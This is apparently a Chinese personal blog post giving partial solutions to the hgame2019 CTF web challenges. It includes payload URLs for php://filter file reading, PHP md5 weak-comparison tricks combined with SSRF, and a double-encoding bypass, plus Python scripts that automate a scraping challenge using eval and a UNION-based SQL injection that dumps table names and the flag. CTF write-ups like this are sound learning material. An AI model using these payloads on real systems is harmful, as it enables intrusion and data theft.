醉梦半醒的博客

hgame2019 部分web-wp

字数统计: 480阅读时长: 2 min
2019/02/22 Share

Level – Week 1

谁吃了我的flag:
根据题目提示可以看出是vim泄露
vim -r http://118.25.111.31:10086/.index.html.swp

换头大作战:

very easy web:
url双次编码绕过
http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572

can u find me?:

Level-week 2

easy_php:
http://118.24.25.25:9999/easyphp/img/index.php?img=php://filter/read=convert.base64-encode/resource=….//flag

some php tricks:
md5弱类型比较加ssrf
http://118.24.3.214:3001/?str1=240610708&str2=s878926199a&str3[]=240610708&str4[]=s878926199a&H.game[]=10000e&url=http://@127.0.0.1:80@www.baidu.com/admin.php?filename=php://filter/read=convert.base64-encode/resource=flag.php

baby-spider:

1.不伪装头部第十次post关机代码

2.css样式导致爬虫下来的并不是真正显示的题目

 

import requests
import re
import sys
header = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
"Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8"}
url1="http://111.231.140.29:10000"
session=requests.Session()
data1={
    'token':'PBbMpC54RK0j4s5eZhakGwBQN5Yz7DOV'
}
r1=session.post(url1,data=data1)
url2="http://111.231.140.29:10000/question"
r2=session.get(url2)
demo=r2.text
rst1=re.search('(.+?)',demo)
if rst1:
    go=eval(rst1.group(1)[:-2])
url3="http://111.231.140.29:10000/solution"
for i in range(10):
    data2={
        'answer':go
    }
    r3=session.post(url3,headers=header,data=data2)
    demo2=r3.text
    rst3=re.search('(.+?)',demo2)
    if rst3:
        go=eval(rst3.group(1)[:-2])
print(demo2)
print(go)
dataflag={
    'answer':go
}
flag=session.post(url3,headers=header,data=dataflag)
print(flag.text)

一部分,未完成第二个绕过

Level-week 3

sqli-1:

 

import requests
import hashlib
url = "http://118.89.111.179:3000"
cookie={'PHPSESSID':'bcsjkikm26hfpfq502ogcklf6d'}
def getcode():
    rlt = requests.get(url,cookies=cookie)
    print(rlt.text)
    code=rlt.text[-18:-14]
    for i in range(0,9999999):
        if hashlib.md5(str(i).encode()).hexdigest()[0:4] == code:
            answer=str(i)
            break
    print(answer)
    return answer
def sqlcode(go):
    answer = getcode()
    url1=url+"/?code="+answer+"&id="+go
    r = requests.get(url=url1,cookies=cookie)
    print(url1)
    print(r.text)
a="1 union select database()#" 
# 获取数据库
b="1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#"
#获取表名
c="1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)%23"
#获取列名
d="1 union select f14444444g from hgame.f1l1l1l1g"
sqlcode(d)
CATALOG